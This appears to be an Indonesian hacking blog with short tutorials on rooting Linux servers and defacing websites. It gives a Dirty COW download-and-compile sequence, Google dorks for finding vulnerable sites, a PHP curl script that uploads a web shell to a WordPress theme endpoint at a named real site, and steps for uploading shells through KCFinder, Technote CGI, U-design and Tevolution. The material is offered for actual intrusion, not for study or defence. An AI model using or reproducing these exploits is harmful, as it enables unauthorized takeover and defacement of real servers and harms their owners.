Selasa, 21 Maret 2017

How To Rooting Server Linux 2016



Bahan Bahan
-Putty (kalo windows)
- ssh/VPS
-Shell backdoor

Kalo ada yg kurang jelas di vidieo ini urutannya
wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
gcc -pthread dirty.c -o namafileygdiinginkan -lcrypt
chmod +x namafileygdiinginkan
./namafileygdiinginkan

kalo pas gcc denied pake yg udah di compile aja jadi tinggal chmod
http://internet-konslet.net/dirty





         

Minggu, 19 Maret 2017

Technote CGI Exploit 0.4 Remote Shell Upload Vulnerability

Technote CGI Exploit 0.4 Remote Shell Upload Vulnerability

xampp > perl > bin
cd c:\xampp\perl\bin                  <--  itu kalo di xampp,karna saya di ssh/vps
perl exploit.pl target

Google Dork 1 : inurl:/cgi-bin/technote/
Google Dork 2 : inurl:".cgi?board=FREE_BOARD"
Google Dork 3 : intext:"TECHNOTE-TOP"

exploit: http://pastebin.com/DQ1uEQd4


Senin, 13 Maret 2017

Deface dengan array tipe files[]

Dork: inurl:/server/php ext:jpg < kembangin aja yaa
Dorking aja seperti biasa(dorking di image yaa)


pilih gambar yg mana aja lalu


Klik yg saya tandai yaaa nanti otomatis kamu akan ke website ntah website apa
Kalo dah ke website lalu ctrl + u terus ctrl + f  ketik "/server/php < buat tau patch bugnya

Klik aja nanti yg muncul warna nah disitu patch bugnya
Hapus sesudah /server/php pokonya sisain site/patch/server/php


pokonya gitu deh yaa :'v 
Kurang lebih gini vulnnya atau files[]



copy url masukin ke exploiter online
http://tedcbandung.com/kti/tools/



yg di kiri colum kecil itu isi files[] ya terus lock deh
lalu pilih file yg mau kamu upload/shell
kalo ada nama shell kamu kaya gini itu berarti berhasil di upload ya tinggal akses :'v


akses shell?site/patch/server/php/files/shell.php
bisa lain juga gimana munculnya aja pas di upload
oke tq sekian


Jumat, 27 Januari 2017

Tutorial deface Wordpress Themes holding_pattern

- Exploit Title: Wordpress Themes Holding Pattern
- Google Dork 1 : inurl:/wp-content/themes/holding_pattern/
-Exploit : /wp-content/themes/holding_pattern/admin/upload-file.php

<?php
$uploadfile="chaYankVica.php";
$target = "http://www.shani-indira.org/wp-content/themes/holding_pattern/admin/upload-file.php";
$domain = explode("/", $target);
$server_addr = gethostbyname($domain[2]);
$ch = curl_init($target."/wp-content/themes/holding_pattern/admin/upload-file.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_VERBOSE, false);
curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.')));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
====================================================================================================
dorking ae kek biasa
kali ini gua udah ada live target
masukin exploit, vuln = blank
jan lupa exploiter ama shell simpen satu directory
xampp/php/
kalo ada bacaan succes berarti shell berhasil ke upload
akses nya ?
/wp-content/themes/holding_pattern/uploads/shell.php
webnya asu :'v
dah gitu aja yaa tq
-BERDENDANGC0DE

Senin, 19 Desember 2016

Tutorial Deface Dengan U-design

Dork: inurl:/wp-content/themes/u-design/sliders/
eXploit: site/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php

Vuln= Blank
Csrf online : http://kazuto.ml/tools/csrf/

Sabtu, 26 November 2016

Tutorial Deface Dengan Kcfinder

Dork: inurl:/kcfinder (kembangin lagi)
Exploit: site/patch/kcfinder/browse.php

akses? site/patch/kcfinder/upload/files/shell.php
ext shell: php.5 php,ndsxf php.pjpeg dll

Rabu, 16 November 2016

Tutorial Deface Wordpress Plugins Tevolution

dork:inurl:/wp-content/plugins/tevolution/
============================================
exploit: /wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
========================================================================================================
exploiter: http://tribratanewsklaten.info/logo/adfinder.php
========================================================================================================
Vuln?Blank
akses shell site/wp-content/uploads/tahun/bulan/namashellrandom

 

Copyright @ 2013 BerdendangC0de.

Designed by Templateiy & CollegeTalks